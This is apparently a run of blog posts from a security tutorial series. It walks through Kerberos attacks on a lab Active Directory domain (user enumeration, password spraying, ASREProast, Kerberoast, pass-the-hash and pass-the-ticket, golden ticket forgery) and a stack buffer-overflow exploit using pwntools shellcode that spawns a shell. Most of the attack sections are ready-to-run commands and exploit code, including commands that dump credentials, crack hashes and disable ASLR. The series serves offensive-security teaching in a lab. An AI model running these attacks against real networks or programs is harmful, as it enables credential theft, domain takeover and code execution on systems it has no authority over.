Kerbrute stands out as a highly recommended tool for user enumeration in Kerberos-based systems, particularly for its ability to perform the task without risking account lockouts. This feature is invaluable during internal pentesting, allowing for the accumulation of a user list without alerting system administrators or disrupting user activities.

The command `./kerbrute_linux_amd64 userenum -d shadow.local usernames.txt` serves as a gateway to effectively enumerate users within the domain &apos;shadow.local&apos;, using a list of potential usernames. This list can be curated from various sources, including the insightful GitHub repository &quot;insidetrust/statistically-likely-usernames&quot;.

![](/content/images/2023/06/image-15.png)

Kerbrute samble to enumerate users

This GitHub repository offers a compilation of wordlists specifically designed for creating statistically probable usernames. These lists are tailored for password attacks and security testing, making them a perfect companion for tools like Kerbrute. The advantage of using these lists lies in their non-intrusive nature, ensuring that the enumeration process does not trigger account lockouts, thus maintaining stealth and efficiency in pentesting scenarios.

The usernames identified through this process can serve as a foundation for further attacks, such as the “ASREProast” technique, which will be discussed in subsequent sections. The ability to accumulate a list of potential targets without alerting the network&apos;s defenses marks a significant step in the penetration testing process.

For those interested in exploring and utilizing these wordlists, visit the GitHub repository: [insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames). This resource provides an array of wordlists that are pivotal for successful user enumeration and subsequent penetration testing strategies.

### Brute Force and Password Spraying

While `kerbrute` can also perform brute force and password spraying attacks to discover valid domain credentials, caution is advised. These methods can lead to account lockouts, contingent on the domain&apos;s password policy. An example of a password spraying attack would be testing a common password across multiple users, with a safety feature to halt the attack if lockouts are detected.

```bash
./kerbrute_linux_amd64 passwordspray -d shadow.local usernames.txt Password123 --safe

```

![](/content/images/2023/06/image-16.png)

Password spraying attack with kerbrute

### User=Pass Technique

An intriguing method involves testing scenarios where the username is the same as the password. It&apos;s surprisingly effective at times.

```bash
cat userpass.txt | ./kerbrute -d shadow.local bruteforce -

```

## Unlocking Secrets with ASREProast: A Deep Dive into Kerberos Authentication Exploitation

![](/content/images/2023/06/image-17.png)

ASREProast diagram

Imagine a scenario where we&apos;ve successfully enumerated domain users, but without acquiring any passwords. This is where the &quot;ASREProast&quot; attack, a sophisticated method targeting the second step of the Kerberos authentication process (AS-REP), comes into play. The crux of this technique lies in requesting Ticket Granting Tickets (TGTs) without needing the user&apos;s NT hash, effectively bypassing pre-authentication requirements.

This vulnerability stems from an option in Active Directory settings that allows certain users to bypass pre-authentication. By leveraging this setting, attackers can intercept the AS-REP message from the server, which includes a part encrypted with the user’s NT hash. The ultimate goal? To decrypt this hash and reveal the user&apos;s plaintext password.

One of the potent tools in executing the ASREProast attack is the &quot;impacket-GetNPUsers&quot; script from the Impacket suite. For instance, the command `impacket-GetNPUsers &apos;shadow.local/beruinsect:Password3&apos; -dc-ip 192.168.253.130 -outputfile asreproast-hashes.txt` is designed to exploit this vulnerability. However, it&apos;s crucial to note that this attack only works if the user’s account is configured to bypass Kerberos pre-authentication.

In cases where this configuration is not set, and the attack yields an error, one can enable this option via Active Directory management tools. By modifying user settings to disable pre-authentication, attackers can then re-run the attack to capture the hash successfully.

![](/content/images/2023/06/image-18.png)

The user does not have the pre-authentication option enabled.

![](/content/images/2023/06/image-19.png)

Configuration to be set to make the user vulnerable

![](/content/images/2023/06/image-20.png)

Successful attack

Once the hash is obtained, it can be subjected to password cracking tools like Hashcat. A typical command like `hashcat -m 18200 --force -a 0 asreproast-hashes.txt pass.txt` can be employed to crack the hash and expose the user’s password.

![](/content/images/2023/06/image-23.png)

Cracking of AS-REP to obtain user passwords

For broader exploitation, the &quot;impacket-GetNPUsers&quot; script also permits the use of a user list file, enhancing the attack&apos;s efficiency by allowing the extraction of AS-REP messages from multiple users simultaneously. The command for this broader approach would be:

```bash
impacket-GetNPUsers -userfile usernames.txt -dc-ip 192.168.253.130 -format hashcat -outputfile asreproast-hashes.txt

```

![](/content/images/2023/06/image-24.png)

ASREProast attack via user listing

## Harnessing Kerberoast: Targeting the Heart of Kerberos TGS Exchange

![](/content/images/2023/06/image-25.png)

Part of the authentication process affected by the Kerberoast attack.

Kerberoast is a formidable attack vector that targets a critical juncture in the Kerberos authentication process—the point where the user receives the Ticket Granting Service (TGS) ticket, a key step in the Kerberos TGS Exchange (Step 4: KRB-TGS-REP). This attack is particularly insidious because it exploits the encryption of part of the message with the NT hash of the service account. By cracking this encryption, attackers can unveil the clear text password of the service account.

The attack is primarily directed at service accounts linked to user accounts, rather than those tied to computer accounts. The latter often possess complex, automatically generated passwords, making them less vulnerable. However, user-linked service accounts often have weaker, user-defined passwords and tend to carry high-level domain privileges, making them ripe targets for exploitation.

Understanding Service Principal Names (SPNs) is crucial for this attack. SPNs are unique identifiers for services within an Active Directory environment, formatted as `service_class/machine_name[:port][/path]`. To register a service tied to a user account in a domain, one would use a command like:

```bash
setspn -a DC-SHADOW/SQLService.shadow.local:60111 SHADOW\SQLService

```

This command creates an SPN for a service, linking it to a specific user account. Verification of the SPN creation can be done using:

```bash
setspn -T shadow.local -Q */*

```

  
For executing the Kerberoast attack, one needs a valid domain account, as it requires a TGT to request TGSs from the domain controller. The GetUserSPNs.py script from Impacket, for instance, is designed to facilitate this process:

```bash
GetUserSPNs.py &apos;shadow.local/beruinsect:Password4&apos; -dc-ip 192.168.253.130 -outputfile kerberoast-hashes.txt

```

![](/content/images/2023/06/image-26.png)

Successful Kerberoast attack

Once the TGS ticket is acquired, attackers can employ password-cracking tools like Hashcat to decrypt the service account password:

```bash
hashcat -m 13100 --force -a 0 kerberoast-hashes.txt pass.txt

```

![](/content/images/2023/06/image-27.png)

Successful brute force attack

## Mastering &apos;Over Pass the Hash&apos; in Kerberos Authentication

The &apos;Over Pass the Hash&apos; attack is a clever maneuver in the Kerberos authentication landscape, focusing on a key aspect of the process: In Step 1 (Domain Authentication), a user&apos;s clear password isn&apos;t mandatory for requesting TGT (Ticket Granting Ticket) tickets; instead, their NT hash suffices. This attack exploits this facet by substituting the user&apos;s NT hash for their actual password to acquire valid TGT tickets, enabling domain authentication.

![](/content/images/2023/06/image-28.png)

Affected part of the authentication process by the &quot;Over Pass The Hash&quot; attack.

The primary tool for this attack is Impacket&apos;s `getTGT`, which facilitates the acquisition of TGT tickets using a user&apos;s NT hash. Here&apos;s an example of how the `getTGT` command is used:

```bash
impacket-getTGT shadow.local/ironhammer -hashes :7247e8d4387e76996ff3f18a34316fdd -dc-ip 192.168.253.130

```

![](/content/images/2023/06/image-29.png)

TGT ticket request

Post-acquisition of the TGT ticket, attackers can leverage tools like `psexec` for authentication and accessing target machines. Remember, Kerberos authentication demands the hostname, not the IP address of the target. Setting the appropriate environment variable is essential:

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/ironhammer.ccache

impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.131 -no-pass -k shadow.local/ironhammer@pc-beru.shadow.local

```

![](/content/images/2023/06/image-30.png)

Execution of psexec via kerberos authentication

An intriguing facet of this attack is its versatility: it can be executed using Kerberos keys as an alternative to the NT hash. Kerberos keys, pivotal in ticket and message encryption, are often cached in the Local Security Authority Subsystem Service (LSASS). Tools like Mimikatz or secretsdump are adept at extracting these keys. For instance, a dump of the NTDS (Active Directory database) using secretsdump can reveal these keys.

![](/content/images/2023/06/image-44.png)

NTDS dump to obtain beruinsect user key

![](/content/images/2023/06/image-45.png)

Obtaining the user&apos;s ticket via his kerberos key

## Understanding &apos;Pass the Ticket&apos; in Kerberos Authentication

![](/content/images/2023/06/image-31.png)

Pass the ticket technique

The &apos;Pass the Ticket&apos; attack revolves around the strategic acquisition and utilization of Kerberos tickets, specifically TGT (Ticket Granting Ticket) and TGS (Ticket Granting Service). The core idea is to use these tickets—obtained through LSASS content dumping via tools like Mimikatz or lsassy—for accessing various domain services.

The process begins with ticket extraction. For instance, using the `lsassy` tool, we can retrieve Kerberos tickets with a command like:

```bash
lsassy -d shadow.local -u ironhammer -p Password4 192.168.253.131 -K tickets

```

![](/content/images/2023/06/image-38.png)

Running lsassy to get kerberos tickets

Exploring the extracted tickets reveals a treasure trove of information, including multiple user TGTs and TGSs for various services, such as Samba (cifs\_dc-shadow) or LDAP (ldap\_dc-shadow). Each ticket is linked to a specific user, providing insights into their domain access privileges.

![](/content/images/2023/06/image-42.png)

Example of tickets

To make these tickets usable for attacks, they often need to be converted to a different format. This is where the &apos;impacket-ticketConverter&apos; tool comes into play, transforming tickets from .kirbi to .ccache format. Once converted, setting the `KRB5CCNAME` environment variable is crucial for leveraging these tickets with various tools. For instance:

![](/content/images/2023/06/image-41.png)

&lt;details&gt;
&lt;summary&gt;Convert ticket to format usable by impacket&lt;/summary&gt;

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/tickets/beru.ccache

```
&lt;/details&gt;


This setup enables the use of tools like Impacket&apos;s `psexec` for authentication, similar to what is done in &apos;Pass the Hash&apos; but with the added advantage of utilizing actual Kerberos tickets.

## The Intricacies of Golden and Silver Tickets in Kerberos

Golden and Silver Tickets represent two potent forms of attacks within the Kerberos authentication protocol, each leveraging different aspects of the system.

**Golden Tickets**: These are akin to master keys, allowing attackers to forge TGT (Ticket Granting Tickets) for any user. The linchpin for this attack is the krbtgt account – the central figure in the Kerberos ticketing system. Compromising this account, specifically obtaining its NT hash, is crucial. Once this is achieved, attackers can use tools like Impacket’s `ticketer` to create TGTs for any user, thus gaining broad access to domain services.

![](/content/images/2023/06/image-34.png)

Domain SID

![](/content/images/2023/06/image-35.png)

NT hash of the krbtgt account

To execute this attack, one needs the domain&apos;s SID and the krbtgt account’s NT hash. With these in hand, crafting a TGT for even the domain administrator is possible. For example:

```bash
impacket-ticketer -domain-sid  S-1-5-21-1545742773-2923955266-673312136 -nthash 011948128d80ec39af3a837c5d153dea -domain shadow.local administrator

```

![](/content/images/2023/06/image-36.png)

ticketer to create a TGT ticket of the admin user

Post-creation, the ticket can be used for domain authentication as seen in:

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/administrator.ccache
impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.130 -no-pass -k shadow.local/administrator@dc-shadow.shadow.local

```

![](/content/images/2023/06/image-37.png)

Remote execution of commands through kerberos authentication

**Silver Tickets**: These focus on forging TGS (Ticket Granting Service) tickets for specific services. Instead of needing the krbtgt account’s NT hash, the Silver Ticket attack requires the NT hash of the account running the targeted service. This specificity makes Silver Tickets less sweeping in scope compared to Golden Tickets but still incredibly powerful for accessing particular services.

# **Embracing Kerberos: Understanding and Safeguarding**

In this exploration of the Kerberos authentication protocol, we&apos;ve journeyed through its intricate workings and uncovered the potent attacks that target its core mechanisms. From the fundamental steps of the Kerberos process to the sophisticated strategies of Golden and Silver Ticket attacks, our expedition into this realm has been enlightening.

We delved into various attack methodologies, such as Kerberos brute-force, ASREProast, Kerberoast, and the Over Pass the Hash technique. Each of these exploits highlights a unique vulnerability within the Kerberos system, underscoring the importance of robust security practices in managing and safeguarding authentication processes.

This chapter not only enhances our understanding of Kerberos but also arms us with the knowledge to replicate these attacks in a controlled lab environment. Such practical insights are invaluable in fortifying our defenses against real-world threats.

As we wrap up this chapter, it&apos;s clear that the Kerberos protocol, while robust and sophisticated, is not impervious to exploits. Vigilance, constant learning, and adapting to emerging threats remain our best tools in the ever-evolving landscape of cybersecurity. Let&apos;s continue to embrace these challenges with a keen eye and a readiness to evolve, ensuring the integrity and security of our digital realms. Happy hacking!

# Tips of the article


&lt;details&gt;
&lt;summary&gt;Could you explain to me at a high level what Kerberos is and how it works ?&lt;/summary&gt;

Kerberos, as discussed in previous chapters, is a protocol that enables user authentication and authorization processes. This is done from what is known as Kerberos tickets. When a user wants to authenticate in the domain from Kerberos, he does it against the KDC or Key Distribution Center (it is the domain controller) which, in case of success, will return a ticket called TGT or Ticket Granted Ticket. This ticket will be sent by the user to the KDC every time he wants to authenticate against any service of the domain. Likewise, the KDC will return a TGS or Ticket Granted Service to the user. This ticket will be sent by the user to the machine that has the service running and it will check if the ticket is valid, as well as if the user has the sufficient level of authorization. This whole process is summarized in the following diagram:

![img](/content/images/2023/06/2023-06-06_09-02-39_screenshot.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What tool can I use to enumerate kerberos users? Can this enumeration process block users?&lt;/summary&gt;

We could use &quot;Kerbrute&quot;. This tool does not block users through the user enumeration process because it does not cause login errors.We could use &quot;Kerbrute&quot;. This tool does not block users through the user enumeration process because it does not cause login errors.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the ASPREPRoast attack? What information do I need to perform the ASPREProast attack? Which tool can I use to perform it ?&lt;/summary&gt;

The ASPREProast attack mainly consists in requesting TGTs without providing the timestamp signed with the user’s NT hash, thus making it unnecessary to pre-authenticate. To perform this attack I only need a list of users that I know exists in the domain. To perform this attack I can use the impacket tool getNPUsers.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What does the &quot;Kerberoast&quot; attack consist of? What tool could you use to carry out this attack?&lt;/summary&gt;

This attack consists of requesting service tickets or TGS from the domain controller and then trying to crack them. These service tickets must correspond to user accounts, otherwise it will be impossible to crack them due to the complexity of the password. To carry out this attack we can use the impacket tool getUsersSPNs
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is Over Pass The hash ? What tool can we use to carry out this attack?&lt;/summary&gt;

It consists of requesting TGT tickets but without knowing the user&apos;s password but his NT hash. To perform this attack I can use the impacket script getTGT.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What does the &quot;Pass the Ticket&quot; attack consist of? What environment variable do I have to configure in Linux to use this ticket?&lt;/summary&gt;

It consists of using TGTs or TGSs to authenticate to a certain service. The environment variable to be configured is called &quot;KRB5CCNAME&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do we mean by &quot;Golden Ticket&quot; and &quot;Silver Ticket&quot;? What do I need to form a &quot;Golden Ticket&quot;?&lt;/summary&gt;

First, in case of gold tickets, it consists of the ability to generate TGT tickets from any user. To be able to do this, it is required to have comrpromised the user krbtgt, which, as we saw in the kerberos authentication process, its credentials are the ones used to encrypt the TGT content.  
Silver tickets, on the other hand, refers to the possibility of creating TGS tickets for a given service. In order to do this, we must have obtained the NT hash of the account that is running the service. Let’s put now a use case to forge a gold ticket.

To make a goro ticket I need to know the domain sid as well as have the NT hash or password of the user krbtgt.
&lt;/details&gt;

# Resources

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploiting Buffer Overflow: Crafting Interactive Shell Exploits with Shellcode</title><link>https://www.kayssel.com/post/shellcode-injection</link><guid isPermaLink="true">https://www.kayssel.com/post/shellcode-injection</guid><description>This chapter combines shellcode knowledge and buffer overflow exploitation to gain shell access through a vulnerable program. It includes using pwndbg for detailed analysis and advanced pwntools for crafting effective exploits, bridging theory and practice.</description><pubDate>Sun, 04 Jun 2023 14:27:55 GMT</pubDate><content:encoded># **Integrating Shellcode and Buffer Overflow for Interactive Shell Access**

In this chapter of our series, we delve into the practical application of shellcode and buffer overflow knowledge, culminating in gaining an interactive shell through a vulnerable program. This journey is not just about applying concepts but mastering the art of exploit development using advanced tools.

**What You&apos;ll Learn:**

1.  **Applying Shellcode Knowledge:** We&apos;ll explore how to effectively utilize our understanding of shellcode. This involves crafting precise payloads that interact with the vulnerable program&apos;s memory and execution flow.
2.  **Exploiting Buffer Overflow:** The focus will be on exploiting buffer overflow vulnerabilities to manipulate program behavior. This crucial step is where theoretical knowledge meets practical application.
3.  **Mastering Pwndbg:** A key part of this chapter is learning how to use pwndbg, a powerful enhancement to GDB. This tool provides deeper insights into the program’s execution and helps in fine-tuning our exploit.
4.  **Advanced Use of Pwntools:** We&apos;ll go beyond the basics of the pwntools library. Here, we&apos;ll see how its advanced features can streamline the process of exploit development, particularly in creating and deploying shellcodes.

**Who Should Engage:**

This chapter is designed for individuals who have been following our series and have a foundational understanding of shellcode and buffer overflow. It&apos;s ideal for cybersecurity enthusiasts and professionals who are keen to elevate their skills in practical exploit development.

**The Journey Ahead:**

As we embark on this chapter, prepare to bridge the gap between theory and practice. The skills and techniques acquired here are not just crucial for offensive cybersecurity but also invaluable for defensive strategists seeking to understand and mitigate such exploits. Let&apos;s dive in and experience the thrill of turning vulnerabilities into opportunities for gaining shell access.

# **Exploiting Buffer Overflows: A Strategic Approach to Shellcode Injection**

In this chapter, we build on the insights from [chapter 5](https://www.kayssel.com/post/binary-exploitation-5-smash-the-stack/), focusing on exploiting a buffer overflow vulnerability in the `gets` function. Our goal is to manipulate the program&apos;s execution flow, allowing us to inject and execute our shellcode.

## **Analyzing the Vulnerable Code**

Consider the following simple C program, which contains a critical vulnerability:

```c
//stack5 program
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
	char buffer[64];
	gets(buffer);
}

```

Vulnerable code

## **Developing the Exploitation Strategy**

Our exploitation strategy involves carefully crafting the input to the `buffer` variable. This input will include our shellcode, followed by padding to fill up the space up to the return address. We then inject the memory address of the top of the stack (`esp`) to ensure that our shellcode is executed upon returning from the `main` function.

The following illustration provides a visual summary of this strategy:

![](/content/images/2023/06/image.png)

Attack diagram

## **Compiling the Vulnerable Program**

To compile the program and create an executable that bypasses certain operating system restrictions, we use this command:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack5 stack5.c

```

This command disables protections like stack canaries and non-executable stacks, crucial for our exploitation experiment.

## **Disabling Address Space Layout Randomization (ASLR):**

Finally, to eliminate the randomness in memory address assignments, we disable ASLR with the following command:

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

```

Avoid ASLR

# **Manipulating Program Flow via Buffer Overflow Exploitation**

In this critical section, we&apos;ll harness the buffer overflow vulnerability in the program to alter its execution flow. This approach is essential for successful shellcode injection and execution.

## **Practical Exploration: Creating a Test Payload**

Our first step is to construct a test payload that aligns with our theoretical plan, sans the shellcode. This payload aims to validate our understanding of the buffer overflow impact on the program&apos;s flow. The payload structure will be as follows:

-   **64 &apos;A&apos; Characters:** These serve as padding, filling up to the `ebp` (occupying the entire buffer variable).
-   **4 &apos;B&apos; Characters:** To overwrite the address of the previous `ebp`.
-   **4 &apos;C&apos; Characters:** Intended to replace the return address.

Here&apos;s the command to generate this payload in Python:

```bash
python3 -c &quot;print(&apos;A&apos;*64+&apos;B&apos;*4+&apos;C&apos;*4)&quot;

```

## **Injecting and Analyzing the Payload with Radare2**

With our payload ready, we&apos;ll use `radare2` to inject it into our vulnerable program and observe the stack&apos;s state. The following commands guide you through this process:

1.  Start `radare2` with the vulnerable program: `r2 ./stack5`
2.  Debug the program: `ood`
3.  Analyze the binary: `aaa`
4.  Inspect the main function&apos;s content: `pdf @dbg.main`
5.  Set a breakpoint after `gets`: `db &lt;address-after-gets&gt;`

![](/content/images/2023/06/image-1.png)

Payload insertion in the vulnerable program using radare2

## **Observing Stack Manipulation**

Upon executing the payload, we analyze the stack&apos;s status. The payload&apos;s impact is evident:

-   **Red Highlight:** Represents the top of the stack (`esp`).
-   **Green Highlight:** Indicates the memory address of the previous `ebp`, now overwritten with &apos;B&apos;s.
-   **Blue Highlight:** Marks the intended return address, now overwritten with &apos;C&apos;s.

![](/content/images/2023/06/image-2.png)

Registers with modified values

Advancing the code past the `ret` instruction reveals the altered program flow. The program, having its return address modified, is redirected to the address `0x43434343` (CCCC), confirming our successful manipulation of the program flow.

![](/content/images/2023/06/image-3.png)

Program flow change

# **Crafting the Exploit with Pwntools and Pwndbg**

Having established the groundwork, we now venture into creating the actual exploit using the `pwntools` library, a powerful toolkit for exploit development.

## **Initial Exploit Setup**

We begin by setting up the exploit&apos;s context and constructing the payload:

```python
from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
payload = cyclic(68) #Backfill to the return address
payload += p32(0xdeadbeef) #Stack top memory address injection
p = process(&quot;./stack5&quot;)
p.sendline(payload)
p.interactive()

```

Introductory code to create the exploit

In this snippet:

1.  **Context Configuration:** We define the architecture as 32-bit (i386), suitable for our target exploit.
2.  **Payload Creation:** We use `cyclic` to generate a sequence that fills up to the return address. Then, we append an arbitrary memory address (`0xdeadbeef`) to manipulate the program flow. This address will later be updated with the actual stack top address.

![](/content/images/2023/06/image-4.png)

Sample of the &quot;cyclic&quot; utility

  

![](/content/images/2023/06/image-5.png)

Exploit execution 

## **Integrating Pwndbg for Deeper Analysis**

To further inspect the payload&apos;s impact, we integrate `pwndbg`, an enhancement of the GNU Debugger (GDB), which provides a more insightful view into the program&apos;s execution state.

```python
from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
payload = cyclic(68) #Backfill to the return address
payload += p32(0xdeadbeef) #Stack top memory address injection
p = process(&quot;./stack5&quot;)
gdb.attach(p, &apos;&apos;&apos;
           break *0x08049185
           continue
           &apos;&apos;&apos;)
p.sendline(payload)
p.interactive()

```

Exploit introducing the use of pwngdb

Here, we:

1.  **Set Up the Terminal:** Define the terminal for debugging (in this case, &quot;kitty&quot;).
2.  **Launch with GDB:** Attach the `pwndbg` to the process, setting a breakpoint after `gets` to pause execution and analyze the stack state.

## **Analyzing with Pwndbg**

Upon executing the exploit, `pwndbg` presents an interface for real-time debugging.

![](/content/images/2023/06/image-7.png)

Pwngdb interface

Using the command `telescope`, we examine the stack&apos;s state.

![](/content/images/2023/06/image-8.png)

Payload inserted in the stack

Key observations include:

-   The stack pointer (`esp`) and frame pointer (`ebp`) locations.
-   The injected memory address (`0xdeadbeef`), representing the manipulated return address.

### **Refining the Exploit**

With a clearer understanding of the stack&apos;s layout, we can adjust our exploit&apos;s injected memory address to the actual stack top address, in this case, &quot;0xffffffca48&quot;. This refinement ensures that upon return, the program flow redirects to our payload, setting the stage for the shellcode execution.

# **Injecting Shellcode: Displaying &quot;Hello World&quot;**

With a solid grasp of buffer overflow and padding concepts, we&apos;re now ready to inject our &quot;Hello World&quot; shellcode into the exploit. This critical step moves us closer to achieving command execution on the target machine.

## **Exploit Code with Shellcode Injection**

Here&apos;s the enhanced exploit code incorporating our shellcode:

```python
from pwn import *

# Aleatorización de memoria tiene que estar desactivada
context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
shellcode = &quot;&quot;&quot;
    push 0x90646c72
    push 0x6f77206f
    push 0x6c6c6568
    push 4
    pop eax
    push 1
    pop ebx
    mov ecx, esp
    push 0xb
    pop edx
    int 0x80
&quot;&quot;&quot;


payload = asm(shellcode)
payload += cyclic(68-len(asm(shellcode))) #40
payload += p32(0xffffca48)


p = process(&quot;./stack5&quot;)
gdb.attach(p, &apos;&apos;&apos;
           echo &quot;hi&quot;
           break *0x08049185
           continue
           &apos;&apos;&apos;)
p.sendline(payload)
p.interactive()

```

Exploit to print &quot;hello world&quot;

**Key Components of the Code:**

1.  **Shellcode Integration:** The shellcode designed to print &quot;Hello World&quot; is embedded into the payload.
2.  **Padding Calculation:** The payload is padded to ensure it reaches the return address, calculated as `68 - length of shellcode`.
3.  **Memory Address Injection:** The payload is appended with the specific memory address (`0xffffca48`) for redirecting the program flow.

## **Running the Exploit**

![](/content/images/2023/06/image-9.png)

Decomposition of the stack

On executing the exploit:

-   **Stack Inspection:** You&apos;ll observe the stack filled with the shellcode, padding, and the specified memory address.
-   **Hello World Display:** Executing the `continue` command in `pwndbg` should display &quot;Hello World&quot; on the screen, indicating successful shellcode execution.

![](/content/images/2023/06/image-10.png)

Sample of hello world

## **Analyzing Shellcode Execution**

For a deeper analysis:

-   Use the `step` command in `pwndbg` to trace the shellcode&apos;s execution step-by-step.
-   Observe how the program flow shifts due to the exploit, ensuring the shellcode runs as intended.

![](/content/images/2023/06/image-11.png)

Sample shellcode debugging

# **Leveraging Shellcraft for Advanced Shellcode Generation**

Pwntools offers a remarkable tool, `shellcraft`, designed to simplify the creation of various shellcodes, including those that enable shell access. This tool can generate shellcode for a multitude of purposes swiftly and efficiently.

## **Example: Generating a Shell-Access Shellcode**

Suppose we require a shellcode that grants us shell access. We can easily generate this using `shellcraft`:

```bash
shellcraft -f a i386.linux.sh

```

-   **Command Breakdown:** The `-f` flag specifies the format. In this case, `-a` indicates that we want the shellcode in assembly language.

![](/content/images/2023/06/image-13.png)

Shellcode from shellcraft

## **Integrating Shellcraft Shellcode into Our Exploit**

&lt;details&gt;
&lt;summary&gt;The generated shellcode can be seamlessly incorporated into our exploit code:&lt;/summary&gt;

```python
from pwn import *

# Aleatorización de memoria tiene que estar desactivada
context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
shellcode = shellcraft.sh()

payload = asm(shellcode)
payload += cyclic(68-len(asm(shellcode))) #40
payload += p32(0xffffca48)

p = process(&quot;./stack5&quot;)
gdb.attach(p, &apos;&apos;&apos;
           echo &quot;hi&quot;
           break *0x08049185
           continue
           &apos;&apos;&apos;)
p.sendline(payload)
p.interactive()

```
&lt;/details&gt;


Shellcode to create a shell

## **Execution Outcome**

After running the above exploit:

-   The stack is populated with the new shellcode.
-   On continuation, a shell is spawned (exit `pwndbg` to interact with it).

![](/content/images/2023/06/image-12.png)

Sample of shell achieved

## **Exploring Shellcraft&apos;s Versatility**

`Shellcraft` is not limited to just creating shells. It offers a wide range of functionalities, which can be explored using the `-l` parameter:

```bash
shellcraft -l
...
i386.linux.connect
i386.linux.egghunter
...

```

# **Mastering Shellcode Injection: From Concept to Execution**

In this comprehensive guide, we&apos;ve journeyed through the intricate process of shellcode injection, an essential component in exploiting code vulnerabilities. Beginning with understanding the vulnerable code and strategizing the exploit, we&apos;ve methodically navigated through changing the program flow, creating effective exploits, and finally, harnessing the power of the `shellcraft` tool from `pwntools`.

Key Takeaways:

1.  **Understanding Vulnerabilities:** We started by examining a typical buffer overflow scenario in a vulnerable program, setting the stage for our exploit development.
2.  **Crafting the Exploit:** Step by step, we constructed an exploit, first verifying our approach without shellcode and then incrementally adding complexity. This process included padding calculations and memory address manipulations to alter the program&apos;s execution flow.
3.  **Injecting Shellcode:** We then progressed to injecting a &quot;Hello World&quot; shellcode, demonstrating the exploit&apos;s capability to execute custom code.
4.  **Elevating with Shellcraft:** Finally, we explored `shellcraft`, a powerful feature of `pwntools`, which significantly simplifies the process of generating diverse shellcodes, including those that provide shell access.

**Impact and Implications:**

This article not only imparts technical know-how but also emphasizes the importance of understanding underlying vulnerabilities and the mechanics of exploits. It serves as a testament to the evolving landscape of cybersecurity, where knowledge of such techniques is vital for both offensive and defensive strategies in network security.

As we conclude, remember that the journey through shellcode injection is more than just about executing commands; it&apos;s about understanding the depth of vulnerabilities, the creativity in crafting exploits, and the continuous learning in the ever-changing field of cybersecurity.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is the most classic strategy used for shellcode execution?&lt;/summary&gt;

Use an existing vulnerability in the code to change the value of the return address of a function to gain control of the flow and force shellcode execution.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What technique can I use in conjunction with a debugger such as radare2 to identify where the return address is located?&lt;/summary&gt;

I can use a padding of letters which I know their translation to hexadecimal so that, when radare finishes the execution, I can identify the 4 bytes corresponding to the return address.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can we use together with pwntools to debug an exploit ? Of the latter, what function can I use to get an overview of the status of the stack?&lt;/summary&gt;

We can use gdb, specifically pwngdb. If we want to have a view of the status of the stack, we can use the &quot;Telescope&quot; function.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Which tool can I use to generate shellcodes? How can I display a shellcode in assembler with this tool ?&lt;/summary&gt;

I can use Shellcraft. To display a shellcode in assembler, I can use the following:

```bash
shellcraft -f a i386.linux.sh

```
&lt;/details&gt;</content:encoded><author>Ruben Santos</author></item><item><title>Shellcode Mastery: Crafting, Optimizing, and Debugging Assembler Code</title><link>https://www.kayssel.com/post/introduction-to-the-creation-of-shellcodes</link><guid isPermaLink="true">https://www.kayssel.com/post/introduction-to-the-creation-of-shellcodes</guid><description>&quot;Explore shellcode development: Learn assembler programming for creating efficient, compact shellcodes, avoid null character issues, and use diagnostic tools like radare2 and strace for effective troubleshooting</description><pubDate>Fri, 26 May 2023 12:26:04 GMT</pubDate><content:encoded># **Introduction: The Art and Science of Shellcode Development**

Welcome to an enlightening exploration into the world of shellcode development, a critical component in the realm of software exploitation and cybersecurity. This chapter is designed to guide you through the intricate process of creating, optimizing, and troubleshooting shellcode - the powerful strings of bytes that turn code vulnerabilities into opportunities for system control.

In this journey, we will:

1.  **Demystify Shellcode:** Start by understanding what shellcode is and its pivotal role in exploiting software vulnerabilities. We&apos;ll delve into how shellcodes function as conduits for executing commands on a target machine, potentially leading to access control or privilege escalation.
2.  **Assemble with Assembler:** Dive into the foundational aspects of shellcode creation using assembler programming. Learn how syscalls (system calls) work and how they are integral to shellcode functionality, setting the stage for your first hands-on experience in crafting a basic &quot;Hello World&quot; shellcode.
3.  **Focus on Efficiency:** Discover the importance of optimizing shellcode size. Learn why every byte matters and explore techniques to streamline your code, ensuring it fits within the constraints of the target program&apos;s buffer space.
4.  **Overcome Null Character Challenges:** Address a common hurdle in shellcode development - avoiding null characters that can prematurely terminate the shellcode execution. We&apos;ll discuss strategies to craft shellcode that is robust and uninterrupted.
5.  **Utilize Diagnostic Tools:** Equip yourself with powerful debugging tools like `radare2` and `strace`. These tools are invaluable in dissecting and understanding the behavior of your shellcode, helping you identify and resolve issues effectively.

